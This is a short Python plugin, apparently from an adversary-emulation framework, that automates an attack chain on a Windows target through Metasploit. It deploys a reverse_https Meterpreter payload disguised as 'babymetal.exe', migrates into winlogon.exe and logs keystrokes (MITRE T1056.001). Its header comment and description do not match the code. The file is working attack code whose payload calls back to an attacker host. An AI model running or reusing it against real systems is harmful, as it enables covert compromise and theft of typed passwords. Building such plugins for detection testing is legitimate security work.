#!/usr/bin/env python3 # A plugin to nmap targets slow motion, to evade sensors from plugins.base.attack import AttackPlugin from app.metasploit import MetasploitInstant class MetasploitKeyloggingPlugin(AttackPlugin): # Boilerplate name = "metasploit_keylogging" description = "Migrate meterpreter to another process via metasploit" ttp = "T1056.001" references = ["https://attack.mitre.org/techniques/T1056/001/"] required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share def __init__(self): super().__init__() self.plugin_path = __file__ def run(self, targets): """ Run the command @param targets: A list of targets, ip addresses will do """ res = "" payload_type = "windows/x64/meterpreter/reverse_https" payload_name = "babymetal.exe" target = self.targets[0] metasploit = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user) metasploit.smart_infect(target, payload=payload_type, payload_name=payload_name, architecture="x64") metasploit.migrate(target, name="winlogon.exe") metasploit.keylogging(target, monitoring_time=20) return res